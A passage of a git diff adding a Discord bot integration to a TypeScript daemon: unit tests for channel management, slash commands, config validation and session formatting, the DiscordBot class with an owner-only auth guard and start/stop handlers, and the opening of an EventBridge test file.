whitespace-only basename', () => { + assert.equal(sanitizeChannelName('/home/ '), 'gsd-unnamed'); + }); +}); + +// ---------- ChannelManager ---------- + +describe('ChannelManager', () => { + // Helper to create a mock Guild with controllable channel cache and create method + function createMockGuild() { + const channels = new Map(); + let createCounter = 0; + + const mockGuild = { + id: 'guild-123', // @everyone role ID matches guild ID + channels: { + cache: { + get: (id: string) => channels.get(id), + find: (fn: (ch: any) => boolean) => { + for (const ch of channels.values()) { + if (fn(ch)) return ch; + } + return undefined; + }, + }, + create: async (opts: { name: string; type: number; parent?: string; permissionOverwrites?: any[] }) => { + createCounter++; + const id = `chan-${createCounter}`; + const ch = { + id, + name: opts.name, + type: opts.type, + parentId: opts.parent ?? null, + edit: async (editOpts: any) => { + // Simulate edit — update parent + ch.parentId = editOpts.parent ?? ch.parentId; + return ch; + }, + }; + channels.set(id, ch); + return ch; + }, + }, + _channels: channels, // internal for test inspection + _getCreateCount: () => createCounter, + }; + + return mockGuild; + } + + function createMockLogger() { + const entries: { level: string; msg: string; data?: any }[] = []; + return { + debug: (msg: string, data?: any) => entries.push({ level: 'debug', msg, data }), + info: (msg: string, data?: any) => entries.push({ level: 'info', msg, data }), + warn: (msg: string, data?: any) => entries.push({ level: 'warn', msg, data }), + error: (msg: string, data?: any) => entries.push({ level: 'error', msg, data }), + entries, + close: async () => {}, + }; + } + + it('resolveCategory creates category when not found', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.name, 'GSD Projects'); + assert.equal(cat.type, ChannelType.GuildCategory); + }); + + it('resolveCategory returns cached category on second call', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat1 = await mgr.resolveCategory(); + const cat2 = await mgr.resolveCategory(); + assert.equal(cat1.id, cat2.id); + // Only one create call should have been made + assert.equal(guild._getCreateCount(), 1); + }); + + it('resolveCategory finds existing category by name', async () => { + const guild = createMockGuild(); + // Pre-populate a matching category + guild._channels.set('existing-cat', { + id: 'existing-cat', + name: 'GSD Projects', + type: ChannelType.GuildCategory, + parentId: null, + }); + + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.id, 'existing-cat'); + // No create calls — found existing + assert.equal(guild._getCreateCount(), 0); + }); + + it('createProjectChannel creates text channel under category', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const channel = await mgr.createProjectChannel('/home/user/my-project'); + assert.equal(channel.name, 'gsd-my-project'); + assert.equal(channel.type, ChannelType.GuildText); + // Category was created first (chan-1), then channel (chan-2) + assert.equal(channel.parentId, 'chan-1'); + }); + + it('archiveChannel moves channel to archive category', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + // Create a project channel first + const channel = await mgr.createProjectChannel('/home/user/project'); + const channelId = channel.id; + + // Archive it + await mgr.archiveChannel(channelId); + + // The channel should have been edit()-ed with the archive category as parent + const archived = guild._channels.get(channelId)!; + // Archive category was created as the 3rd channel (chan-3): category(chan-1), text(chan-2), archive(chan-3) + assert.equal(archived.parentId, 'chan-3'); + + // Verify archive log + const archiveLog = logger.entries.find((e) => e.msg === 'channel archived'); + assert.ok(archiveLog, 'should log channel archived'); + assert.equal(archiveLog!.data.channelId, channelId); + }); + + it('archiveChannel warns when channel not found', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + await mgr.archiveChannel('nonexistent-id'); + const warnLog = logger.entries.find((e) => e.msg === 'archive target not found'); + assert.ok(warnLog, 'should warn about missing channel'); + }); + + it('uses custom category name when provided', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ + guild: guild as any, + logger: logger as any, + categoryName: 'Custom Category', + }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.name, 'Custom Category'); + }); +}); + +// ---------- buildCommands ---------- + +describe('buildCommands', () => { + it('returns array with correct command names', () => { + const commands = buildCommands(); + assert.equal(commands.length, 4); + const names = commands.map((c) => c.name); + assert.ok(names.includes('gsd-status'), 'should include gsd-status'); + assert.ok(names.includes('gsd-start'), 'should include gsd-start'); + assert.ok(names.includes('gsd-stop'), 'should include gsd-stop'); + assert.ok(names.includes('gsd-verbose'), 'should include gsd-verbose'); + }); + + it('each command has a description', () => { + const commands = buildCommands(); + for (const cmd of commands) { + assert.ok(cmd.description, `command ${cmd.name} should have a description`); + assert.ok(cmd.description.length > 0, `command ${cmd.name} description should be non-empty`); + } + }); +}); + +// ---------- formatSessionStatus ---------- + +describe('formatSessionStatus', () => { + function mockSession(overrides: Partial = {}): ManagedSession { + return { + sessionId: 'sess-1', + projectDir: '/home/user/project', + projectName: 'project', + status: 'running', + client: {} as any, + events: [], + pendingBlocker: null, + cost: { totalCost: 0.1234, tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now() - 120_000, // 2 minutes ago + ...overrides, + }; + } + + it('returns "No active sessions." for empty array', () => { + assert.equal(formatSessionStatus([]), 'No active sessions.'); + }); + + it('formats single session with project name and status', () => { + const result = formatSessionStatus([mockSession()]); + assert.ok(result.includes('project'), 'should contain project name'); + assert.ok(result.includes('running'), 'should contain status'); + assert.ok(result.includes('$'), 'should contain cost'); + }); + + it('formats multiple sessions on separate lines', () => { + const sessions = [ + mockSession({ projectName: 'alpha', status: 'running' }), + mockSession({ projectName: 'beta', status: 'blocked' }), + ]; + const result = formatSessionStatus(sessions); + assert.ok(result.includes('alpha'), 'should contain first project'); + assert.ok(result.includes('beta'), 'should contain second project'); + const lines = result.split('\n'); + assert.equal(lines.length, 2, 'should have one line per session'); + }); + + it('formats 5 sessions correctly', () => { + const sessions = Array.from({ length: 5 }, (_, i) => + mockSession({ projectName: `proj-${i}`, status: i % 2 === 0 ? 'running' : 'completed' }), + ); + const result = formatSessionStatus(sessions); + const lines = result.split('\n'); + assert.equal(lines.length, 5); + for (let i = 0; i < 5; i++) { + assert.ok(lines[i].includes(`proj-${i}`)); + } + }); +}); + +// ---------- Command dispatch (mock interaction) ---------- + +describe('command dispatch', () => { + // Minimal mock of a ChatInputCommandInteraction + function mockInteraction(commandName: string, userId: string = 'owner-1') { + let replied = false; + let replyContent = ''; + + return { + user: { id: userId }, + type: 2, // InteractionType.ApplicationCommand + isChatInputCommand: () => true, + commandName, + reply: async (opts: { content: string; ephemeral?: boolean }) => { + replied = true; + replyContent = opts.content; + }, + _getReplied: () => replied, + _getReplyContent: () => replyContent, + }; + } + + // Minimal mock of a non-command interaction + function mockNonCommandInteraction(userId: string = 'owner-1') { + let replied = false; + return { + user: { id: userId }, + type: 3, // InteractionType.MessageComponent + isChatInputCommand: () => false, + _getReplied: () => replied, + }; + } + + // We can't easily test through DiscordBot.handleInteraction since it's private. + // Instead, test the pure functions that the handler calls, and test auth guard + // behavior via the mock interaction flow. + // The command routing logic is tested indirectly through integration of the + // pure helpers (buildCommands, formatSessionStatus, isAuthorized). + + it('gsd-status with no sessions produces empty message', () => { + // Tests the formatSessionStatus path that /gsd-status calls + const result = formatSessionStatus([]); + assert.equal(result, 'No active sessions.'); + }); + + it('unknown command name is not in buildCommands list', () => { + const commands = buildCommands(); + const names = commands.map((c) => c.name); + assert.ok(!names.includes('gsd-unknown'), 'unknown should not be in command list'); + }); + + it('auth guard rejects non-owner on interaction', () => { + // Simulates the first check in handleInteraction + const authorized = isAuthorized('intruder-999', 'owner-1'); + assert.equal(authorized, false); + }); + + it('auth guard accepts owner on interaction', () => { + const authorized = isAuthorized('owner-1', 'owner-1'); + assert.equal(authorized, true); + }); +}); + +// ---------- Config validation: new fields ---------- + +describe('validateConfig — control_channel_id and orchestrator', () => { + it('parses control_channel_id from discord block', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + control_channel_id: 'ch-123', + }, + }); + assert.equal(config.discord?.control_channel_id, 'ch-123'); + }); + + it('omits control_channel_id when not present', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + }, + }); + assert.equal(config.discord?.control_channel_id, undefined); + }); + + it('parses orchestrator model and max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { model: 'claude-opus-2025', max_tokens: 2048 }, + }, + }); + assert.equal(config.discord?.orchestrator?.model, 'claude-opus-2025'); + assert.equal(config.discord?.orchestrator?.max_tokens, 2048); + }); + + it('missing orchestrator block results in undefined', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + }, + }); + assert.equal(config.discord?.orchestrator, undefined); + }); + + it('empty orchestrator block has no model or max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: {}, + }, + }); + // orchestrator object should exist but with no values set + assert.ok(config.discord?.orchestrator !== undefined); + assert.equal(config.discord?.orchestrator?.model, undefined); + assert.equal(config.discord?.orchestrator?.max_tokens, undefined); + }); + + it('ignores non-numeric max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { max_tokens: 'not a number' }, + }, + }); + assert.equal(config.discord?.orchestrator?.max_tokens, undefined); + }); + + it('ignores non-string model', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { model: 42 }, + }, + }); + assert.equal(config.discord?.orchestrator?.model, undefined); + }); +}); + +// ---------- Daemon wiring: orchestrator ---------- + +describe('Daemon orchestrator wiring', () => { + it('orchestrator is undefined when control_channel_id is not set', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-orchestrator.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + assert.equal(daemon.getOrchestrator(), undefined); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('orchestrator is undefined when discord has no control_channel_id', async () => { + // Even with a discord block that fails login, orchestrator should not be created + // because there's no control_channel_id + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-ctl-chan.log'); + + const config: DaemonConfig = { + discord: { + token: 'bad-token', + guild_id: 'g1', + owner_id: 'o1', + // control_channel_id intentionally omitted + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + // Login fails, so orchestrator can't be wired regardless. But the code path + // that checks control_channel_id comes after successful login/eventBridge wiring. + // Since login fails, orchestrator is undefined. + assert.equal(daemon.getOrchestrator(), undefined); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); +}); + +// ---------- /gsd-start and /gsd-stop logic paths ---------- + +describe('/gsd-start and /gsd-stop logic', () => { + // These test the observable logic paths exercised by the handlers. + // Since handleGsdStart/handleGsdStop are private, we test the data layer + // they depend on — project scanning, session listing, and edge cases. + + it('/gsd-start: scanForProjects returning 0 projects', async () => { + // Simulates the "no projects" path + const { scanForProjects } = await import('./project-scanner.js'); + // With no scan roots, should return empty + const projects = await scanForProjects([]); + assert.equal(projects.length, 0); + }); + + it('/gsd-stop: getAllSessions returns empty when no sessions active', async () => { + const { SessionManager } = await import('./session-manager.js'); + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'sm-test.log'); + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const sm = new SessionManager(logger); + const sessions = sm.getAllSessions(); + assert.equal(sessions.length, 0); + await logger.close(); + }); + + it('/gsd-stop: filters to active sessions only', () => { + // Simulate the filter logic used in handleGsdStop + const allSessions: Partial[] = [ + { sessionId: 's1', status: 'running', projectName: 'alpha' }, + { sessionId: 's2', status: 'completed', projectName: 'beta' }, + { sessionId: 's3', status: 'blocked', projectName: 'gamma' }, + { sessionId: 's4', status: 'error', projectName: 'delta' }, + { sessionId: 's5', status: 'starting', projectName: 'epsilon' }, + { sessionId: 's6', status: 'cancelled', projectName: 'zeta' }, + ]; + const active = allSessions.filter( + (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting', + ); + assert.equal(active.length, 3); + assert.deepEqual(active.map((s) => s.projectName), ['alpha', 'gamma', 'epsilon']); + }); + + it('/gsd-start: >25 projects are truncated for select menu', () => { + // Simulate the truncation logic + const projects = Array.from({ length: 30 }, (_, i) => ({ + name: `project-${i}`, + path: `/home/user/project-${i}`, + markers: [] as string[], + lastModified: Date.now(), + })); + const truncated = projects.slice(0, 25); + assert.equal(truncated.length, 25); + assert.equal(truncated[24].name, 'project-24'); + }); +}); diff --git a/packages/daemon/src/discord-bot.ts b/packages/daemon/src/discord-bot.ts new file mode 100644 index 000000000..e4c302354 --- /dev/null +++ b/packages/daemon/src/discord-bot.ts @@ -0,0 +1,491 @@ +/** + * DiscordBot — wraps discord.js Client with login/destroy lifecycle, auth guard, + * and integration with the daemon's SessionManager. + * + * Auth model (D016): single Discord user ID allowlist. All non-owner interactions + * silently ignored; rejections logged at debug level (userId only, no PII). + */ + +import { + Client, + GatewayIntentBits, + REST, + StringSelectMenuBuilder, + ActionRowBuilder, + ComponentType, + type Interaction, + type Guild, + type StringSelectMenuInteraction, +} from 'discord.js'; +import type { DaemonConfig, VerbosityLevel, ProjectInfo } from './types.js'; +import type { Logger } from './logger.js'; +import type { SessionManager } from './session-manager.js'; +import { ChannelManager } from './channel-manager.js'; +import { buildCommands, registerGuildCommands, formatSessionStatus } from './commands.js'; +import type { EventBridge } from './event-bridge.js'; + +// --------------------------------------------------------------------------- +// Pure helpers — exported for testability +// --------------------------------------------------------------------------- + +/** + * Auth guard: returns true iff userId matches the configured owner_id. + * Rejects empty or missing ownerId to fail closed. + */ +export function isAuthorized(userId: string, ownerId: string): boolean { + if (!ownerId || !userId) return false; + return userId === ownerId; +} + +/** + * Validates that all required discord config fields are present. + * Throws with a descriptive message on the first missing field. + */ +export function validateDiscordConfig( + config: DaemonConfig['discord'], +): asserts config is NonNullable { + if (!config) { + throw new Error('Discord config is undefined'); + } + if (!config.token || config.token.trim() === '') { + throw new Error('Discord config missing required field: token'); + } + if (!config.guild_id || config.guild_id.trim() === '') { + throw new Error('Discord config missing required field: guild_id'); + } + if (!config.owner_id || config.owner_id.trim() === '') { + throw new Error('Discord config missing required field: owner_id'); + } +} + +// --------------------------------------------------------------------------- +// DiscordBot class +// --------------------------------------------------------------------------- + +export interface DiscordBotOptions { + config: NonNullable; + logger: Logger; + sessionManager: SessionManager; + /** Optional function to scan for projects (passed from Daemon). */ + scanProjects?: () => Promise; +} + +export class DiscordBot { + private client: Client | null = null; + private destroyed = false; + private channelManager: ChannelManager | null = null; + private eventBridge: EventBridge | null = null; + + private readonly config: NonNullable; + private readonly logger: Logger; + private readonly sessionManager: SessionManager; + private readonly scanProjects?: () => Promise; + + constructor(opts: DiscordBotOptions) { + this.config = opts.config; + this.logger = opts.logger; + this.sessionManager = opts.sessionManager; + this.scanProjects = opts.scanProjects; + } + + /** + * Create the discord.js Client, register event handlers, and log in. + * Throws on login failure — the caller (Daemon) decides whether to continue without the bot. + */ + async login(): Promise { + const client = new Client({ + intents: [ + GatewayIntentBits.Guilds, + GatewayIntentBits.GuildMessages, + GatewayIntentBits.MessageContent, + ], + }); + + client.once('ready', (readyClient) => { + const guildNames = readyClient.guilds.cache.map((g) => g.name).join(', '); + this.logger.info('bot ready', { + username: readyClient.user.tag, + guilds: guildNames, + }); + + // Register slash commands for the configured guild + const rest = new REST({ version: '10' }).setToken(this.config.token); + const commands = buildCommands(); + registerGuildCommands( + rest, + readyClient.user.id, + this.config.guild_id, + commands, + this.logger, + ).catch((err) => { + // Should not reach here — registerGuildCommands catches internally + this.logger.warn('unexpected command registration error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + }); + + client.on('interactionCreate', (interaction: Interaction) => { + this.handleInteraction(interaction); + }); + + // Debug: log all incoming messages at debug level + client.on('messageCreate', (msg) => { + this.logger.debug('raw messageCreate', { + authorId: msg.author.id, + authorBot: msg.author.bot, + channelId: msg.channelId, + contentLength: msg.content.length, + hasContent: msg.content.length > 0, + }); + }); + + // Reconnection observability — structured logging for all shard lifecycle events (R027) + client.on('shardError', (error) => { + this.logger.error('discord shard error', { error: error.message }); + }); + client.on('shardDisconnect', (event, shardId) => { + this.logger.warn('discord shard disconnected', { shardId, code: event.code }); + }); + client.on('shardReconnecting', (shardId) => { + this.logger.info('discord shard reconnecting', { shardId }); + }); + client.on('shardResume', (shardId, replayedEvents) => { + this.logger.info('discord shard resumed', { shardId, replayedEvents }); + }); + client.on('warn', (message) => { + this.logger.warn('discord warning', { message }); + }); + client.on('error', (error) => { + this.logger.error('discord error', { error: error.message }); + }); + + // Wait for both login AND the 'ready' event. + // client.login() resolves on WebSocket auth, but the 'ready' event fires + // asynchronously later. We need 'ready' before getChannelManager() works. + let readyTimeout: ReturnType | undefined; + let readySettled = false; + const readyPromise = new Promise((resolve, reject) => { + readyTimeout = setTimeout(() => { + if (!readySettled) { readySettled = true; reject(new Error('Discord ready timeout (30s)')); } + }, 30_000); + const cleanup = () => { + if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; } + }; + client.once('ready', () => { + cleanup(); + if (!readySettled) { readySettled = true; resolve(); } + }); + client.once('error', (err) => { + cleanup(); + if (!readySettled) { readySettled = true; reject(err); } + }); + // shardDisconnect fires on fatal gateway errors (e.g. 4014 disallowed intents) + client.once('shardDisconnect', (event) => { + cleanup(); + if (!readySettled) { readySettled = true; reject(new Error(`Shard disconnected: ${event.code}`)); } + }); + }); + + try { + await client.login(this.config.token); + } catch (err) { + // Login itself failed — clean up the ready timer so it doesn't fire as unhandled rejection + if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; } + readySettled = true; + throw err; + } + await readyPromise; + this.client = client; + this.destroyed = false; + } + + /** + * Destroy the discord.js Client. Idempotent — safe to call multiple times + * or before login(). + */ + async destroy(): Promise { + if (this.destroyed || !this.client) { + this.destroyed = true; + return; + } + + try { + // discord.js destroy() is synchronous but may throw on double-destroy + this.client.destroy(); + this.logger.info('bot destroyed'); + } catch (err) { + // Swallow cleanup errors — shutdown must not fail + this.logger.debug('bot destroy error (swallowed)', { + error: err instanceof Error ? err.message : String(err), + }); + } finally { + this.client = null; + this.destroyed = true; + } + } + + // --------------------------------------------------------------------------- + // Public accessors + // --------------------------------------------------------------------------- + + /** + * Lazily create a ChannelManager from the configured guild. + * Returns null if the client isn't ready or the guild isn't found. + */ + getChannelManager(): ChannelManager | null { + if (this.channelManager) return this.channelManager; + if (!this.client?.isReady()) return null; + + const guild = this.client.guilds.cache.get(this.config.guild_id); + if (!guild) { + this.logger.warn('guild not found for channel manager', { guildId: this.config.guild_id }); + return null; + } + + this.channelManager = new ChannelManager({ guild, logger: this.logger }); + return this.channelManager; + } + + /** + * Return the underlying discord.js Client, or null if not logged in. + * Used by Daemon to pass to EventBridge as BridgeClient. + */ + getClient(): Client | null { + return this.client; + } + + /** + * Set the EventBridge reference so the bot can dispatch /gsd-verbose commands. + * Called by Daemon after creating the EventBridge. + */ + setEventBridge(bridge: EventBridge): void { + this.eventBridge = bridge; + } + + // --------------------------------------------------------------------------- + // Private: interaction handling + // --------------------------------------------------------------------------- + + private handleInteraction(interaction: Interaction): void { + if (!isAuthorized(interaction.user.id, this.config.owner_id)) { + this.logger.debug('auth rejected', { userId: interaction.user.id }); + return; + } + + // Only handle chat input (slash) commands + if (!interaction.isChatInputCommand()) { + this.logger.debug('non-command interaction', { + type: interaction.type, + userId: interaction.user.id, + }); + return; + } + + const { commandName } = interaction; + this.logger.info('command handled', { commandName, userId: interaction.user.id }); + + switch (commandName) { + case 'gsd-status': { + const sessions = this.sessionManager.getAllSessions(); + const content = formatSessionStatus(sessions); + interaction.reply({ content, ephemeral: true }).catch((err) => { + this.logger.warn('gsd-status reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + case 'gsd-start': + this.handleGsdStart(interaction).catch((err) => { + this.logger.warn('gsd-start handler error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + case 'gsd-stop': + this.handleGsdStop(interaction).catch((err) => { + this.logger.warn('gsd-stop handler error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + case 'gsd-verbose': { + if (!this.eventBridge) { + interaction.reply({ content: 'Event bridge not available.', ephemeral: true }).catch((err) => { + this.logger.warn('gsd-verbose reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + const level = (interaction.options.getString('level') ?? 'default') as VerbosityLevel; + const channelId = interaction.channelId; + this.eventBridge.getVerbosityManager().setLevel(channelId, level); + interaction.reply({ content: `Verbosity set to **${level}** for this channel.`, ephemeral: true }).catch((err) => { + this.logger.warn('gsd-verbose reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + default: + interaction.reply({ content: 'Unknown command', ephemeral: true }).catch((err) => { + this.logger.warn('unknown command reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + } + + // --------------------------------------------------------------------------- + // Private: /gsd-start handler + // --------------------------------------------------------------------------- + + private async handleGsdStart(interaction: import('discord.js').ChatInputCommandInteraction): Promise { + await interaction.deferReply({ ephemeral: true }); + this.logger.info('gsd-start: scanning projects'); + + if (!this.scanProjects) { + await interaction.editReply({ content: 'Project scanning not available.' }); + return; + } + + let projects: ProjectInfo[]; + try { + projects = await this.scanProjects(); + } catch (err) { + this.logger.error('gsd-start: scan failed', { + error: err instanceof Error ? err.message : String(err), + }); + await interaction.editReply({ content: 'Failed to scan for projects.' }); + return; + } + + if (projects.length === 0) { + await interaction.editReply({ content: 'No projects found.' }); + return; + } + + // Discord select menus support max 25 options + const truncated = projects.slice(0, 25); + const select = new StringSelectMenuBuilder() + .setCustomId('gsd-start-select') + .setPlaceholder('Select a project to start') + .addOptions( + truncated.map((p) => ({ + label: p.name.slice(0, 100), // Discord label max 100 chars + value: p.path, + description: p.markers.join(', ').slice(0, 100) || undefined, + })), + ); + + const row = new ActionRowBuilder().addComponents(select); + const reply = await interaction.editReply({ + content: `Select a project to start (${truncated.length}${projects.length > 25 ? ` of ${projects.length}` : ''} projects):`, + components: [row], + }); + + try { + const collected = await reply.awaitMessageComponent({ + componentType: ComponentType.StringSelect, + time: 60_000, + filter: (i) => i.user.id === interaction.user.id, + }) as StringSelectMenuInteraction; + + const projectPath = collected.values[0]; + this.logger.info('gsd-start: project selected', { projectPath }); + + // Defer the update immediately — startSession can take 10-30s to spawn the GSD process, + // and Discord's component interaction token expires in 3 seconds without deferral. + await collected.deferUpdate(); + + try { + const sessionId = await this.sessionManager.startSession({ projectDir: projectPath }); + await interaction.editReply({ + content: `✅ Session started for **${projectPath}** (ID: \`${sessionId}\`)`, + components: [], + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('gsd-start: startSession failed', { error: errMsg, projectPath }); + await interaction.editReply({ + content: `❌ Failed to start session: ${errMsg}`, + components: [], + }); + } + } catch { + // Timeout or other collector error + this.logger.info('gsd-start: selection timed out'); + await interaction.editReply({ content: 'Selection timed out.', components: [] }); + } + } + + // --------------------------------------------------------------------------- + // Private: /gsd-stop handler + // --------------------------------------------------------------------------- + + private async handleGsdStop(interaction: import('discord.js').ChatInputCommandInteraction): Promise { + await interaction.deferReply({ ephemeral: true }); + this.logger.info('gsd-stop: listing sessions'); + + const allSessions = this.sessionManager.getAllSessions(); + const activeSessions = allSessions.filter( + (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting', + ); + + if (activeSessions.length === 0) { + await interaction.editReply({ content: 'No active sessions.' }); + return; + } + + // Discord select menus support max 25 options + const truncated = activeSessions.slice(0, 25); + const select = new StringSelectMenuBuilder() + .setCustomId('gsd-stop-select') + .setPlaceholder('Select a session to stop') + .addOptions( + truncated.map((s) => ({ + label: `${s.projectName} (${s.status})`.slice(0, 100), + value: s.sessionId, + })), + ); + + const row = new ActionRowBuilder().addComponents(select); + const reply = await interaction.editReply({ + content: `Select a session to stop (${truncated.length} active):`, + components: [row], + }); + + try { + const collected = await reply.awaitMessageComponent({ + componentType: ComponentType.StringSelect, + time: 60_000, + filter: (i) => i.user.id === interaction.user.id, + }) as StringSelectMenuInteraction; + + const sessionId = collected.values[0]; + this.logger.info('gsd-stop: session selected', { sessionId }); + + try { + await this.sessionManager.cancelSession(sessionId); + await collected.update({ + content: `✅ Session \`${sessionId}\` stopped.`, + components: [], + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('gsd-stop: cancelSession failed', { error: errMsg, sessionId }); + await collected.update({ + content: `❌ Failed to stop session: ${errMsg}`, + components: [], + }); + } + } catch { + // Timeout or other collector error + this.logger.info('gsd-stop: selection timed out'); + await interaction.editReply({ content: 'Selection timed out.', components: [] }); + } + } +} diff --git a/packages/daemon/src/event-bridge.test.ts b/packages/daemon/src/event-bridge.test.ts new file mode 100644 index 000000000..8516b9dc4 --- /dev/null +++ b/packages/daemon/src/event-bridge.test.ts @@ -0,0 +1,619 @@ +/** + * event-bridge.test.ts — Tests for EventBridge orchestrator. + * + * Uses mock SessionManager (EventEmitter), mock ChannelManager, + * mock Discord Client, and mock Logger to test event wiring, + * blocker handling, conversation relay, and cleanup. + */ + +import { describe, it, mock } from 'node:test'; +import assert from 'node:assert/strict'; +import { EventEmitter } from 'node:events'; +import { EventBridge } from './event-bridge.js'; +import type { EventBridgeOptions, BridgeClient } from './event-bridge.js'; +import type { PendingBlocker, ManagedSession, DaemonConfig, SessionStatus } from './types.js'; +import type { SdkAgentEvent, RpcClient, RpcExtensionUIRequest } from '@gsd-build/rpc-client'; + +// --------------------------------------------------------------------------- +// Mock factories +// --------------------------------------------------------------------------- + +function createMockLogger() { + return { + debug: mock.fn(() => {}), + info: mock.fn(() => {}), + warn: mock.fn(() => {}), + error: mock.fn(() => {}), + }; +} + +function createMockChannelManager() { + const sentMessages: unknown[] = []; + const mockChannel = { + id: 'ch-123', + send: mock.fn(async (_payload: unknown) => { + sentMessages.push(_payload); + return { id: 'msg-1' }; + }), + createMessageComponentCollector: mock.fn((_opts?: unknown) => { + const collector = new EventEmitter() as EventEmitter & { stop: (reason?: string) => void }; + collector.stop = (reason?: string) => collector.emit('end', [], reason ?? 'manual'); + return collector; + }), + }; + return { + createProjectChannel: mock.fn(async (_dir: string) => mockChannel), + _channel: mockChannel, + _sentMessages: sentMessages, + }; +} + +function createMockClient(): BridgeClient & EventEmitter { + const emitter = new EventEmitter(); + const dmSendFn = mock.fn(async () => ({})); + const fetchFn = mock.fn(async (_id: string) => ({ send: dmSendFn })); + (emitter as unknown as Record).users = { fetch: fetchFn }; + return Object.assign(emitter, { + users: { fetch: fetchFn }, + _dmSend: dmSendFn, + }) as unknown as BridgeClient & EventEmitter; +} + +function createMockSessionManager() { + const sm = new EventEmitter() as EventEmitter & { + getSession: ReturnType; + resolveBlocker: ReturnType; + }; + sm.getSession = mock.fn((_id: string) => undefined as ManagedSession | undefined); + sm.resolveBlocker = mock.fn(async (_sid: string, _resp: string) => {}); + return sm; +} + +function createMockSession(overrides?: Partial): ManagedSession { + return { + sessionId: 'sess-1', + projectDir: '/test/project', + projectName: 'project', + status: 'running' as SessionStatus, + client: { + steer: mock.fn(async (_msg: string) => {}), + prompt: mock.fn(async () => ({})), + } as unknown as RpcClient, + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + ...overrides, + }; +} + +const DEFAULT_CONFIG: DaemonConfig = { + discord: { + token: 'test-token', + guild_id: 'guild-1', + owner_id: 'owner-1', + dm_on_blocker: false, + }, + projects: { scan_roots: [] }, + log: { file: '/tmp/test.log', level: 'debug', max_size_mb: 10 }, +}; + +function buildBridge(overrides?: Partial) { + const sessionManager = createMockSessionManager(); + const channelManager = createMockChannelManager(); + const client = createMockClient(); + const logger = createMockLogger(); + + const opts: EventBridgeOptions = { + sessionManager: sessionManager as unknown as EventBridgeOptions['sessionManager'], + channelManager: channelManager as unknown as EventBridgeOptions['channelManager'], + client, + config: DEFAULT_CONFIG, + logger: logger as unknown as EventBridgeOptions['logger'], + ownerId: 'owner-1', + ...overrides, + }; + + const bridge = new EventBridge(opts); + return { bridge, sessionManager, channelManager, client, logger }; +} + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- +const tick = () => new Promise((r) => setTimeout(r, 30)); + +function mockFn(obj: unknown): { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } } { + return obj as { mock: { callCount(): number; calls: Array<{ arguments: unknown[]; result?: unknown }> } }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('EventBridge', () => { + describe('lifecycle', () => { + it('start() subscribes to session manager events and messageCreate', () => { + const { bridge, sessionManager, client } = buildBridge(); + bridge.start(); + assert.ok(sessionManager.listenerCount('session:started') > 0); + assert.ok(sessionManager.listenerCount('session:event') > 0); + 